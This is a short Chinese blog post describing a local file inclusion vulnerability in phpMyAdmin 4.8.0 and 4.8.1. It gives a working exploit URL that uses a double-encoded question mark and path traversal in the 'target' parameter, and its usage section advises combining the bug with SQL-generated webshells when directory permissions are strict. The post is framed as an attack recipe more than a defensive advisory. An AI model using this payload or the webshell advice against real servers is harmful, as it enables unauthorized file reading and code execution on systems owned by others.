phpMyAdmin 4.8.1本地文件包含漏洞

原创 sauren  2018-12-18 14:50  阅读 203 views 次 评论 0 条

一、版本及相关条件

Version: 4.8.0, 4.8.1

需登陆

版本下载地址:https://files.phpmyadmin.net/phpMyAdmin/4.8.1/phpMyAdmin-4.8.1-all-languages.zip

二、漏洞EXP

http://localhost/phpMyAdmin481/index.php?target=db_sql.php%253f/../composer.json

三、如何使用

由于此漏洞是登陆后才可以使用的,比较鸡肋。一般登陆后直接执行SQL语句生成shell即可,但有时目录权限比较严格,不能在WEB目录内生成,则可以结合本例使用。

本文地址:https://www.sk15.net/archives/113.html
版权声明:本文为原创文章,版权归 sauren 所有,欢迎分享本文,转载请保留出处!
高性能云服务器特惠

发表评论


表情